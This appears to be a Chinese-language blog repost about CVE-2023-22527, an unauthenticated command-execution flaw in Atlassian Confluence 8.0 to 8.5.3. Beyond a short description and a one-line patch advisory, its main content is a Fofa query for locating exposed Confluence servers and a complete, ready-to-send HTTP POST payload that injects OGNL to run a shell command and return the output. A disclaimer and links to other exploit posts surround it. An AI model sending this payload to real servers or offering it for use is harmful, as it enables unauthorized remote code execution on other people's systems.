（CVE-2023-22527）Atlassian Confluence Data Center 命令执行漏洞（附POC）

admin

102800
文章

87
评论

2024年1月24日11:50:40评论33 views字数 996阅读3分19秒阅读模式

免责声明：该公众号大部分文章来自作者日常学习，也有部分文章是经过作者授权和其他公众号白名单转载，如需转载，请联系公众号。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

在Confluence 8.0到8.5.3版本之间，存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞，未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。

0x02 影响平台

>= v8.0 && <= v8.5.3

0x03 漏洞复现

Fofa: app="ATLASSIAN-Confluence"

首页：

（CVE-2023-22527）Atlassian Confluence Data Center 命令执行漏洞（附POC）

构造带回显payload，发送数据包

POST /template/aui/text-inline.vm HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 285label=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

（CVE-2023-22527）Atlassian Confluence Data Center 命令执行漏洞（附POC）

0x04 修复建议

关注厂商更新产品：https://confluence.atlassian.com

‍‍0x05 参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-22527

‍

原文始发于微信公众号（SheYin）：（CVE-2023-22527）Atlassian Confluence Data Center 命令执行漏洞（附POC）

左青龙
微信扫一扫

右白虎
微信扫一扫

（CVE-2023-22527）Atlassian Confluence Data Center 命令执行漏洞（附POC）

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信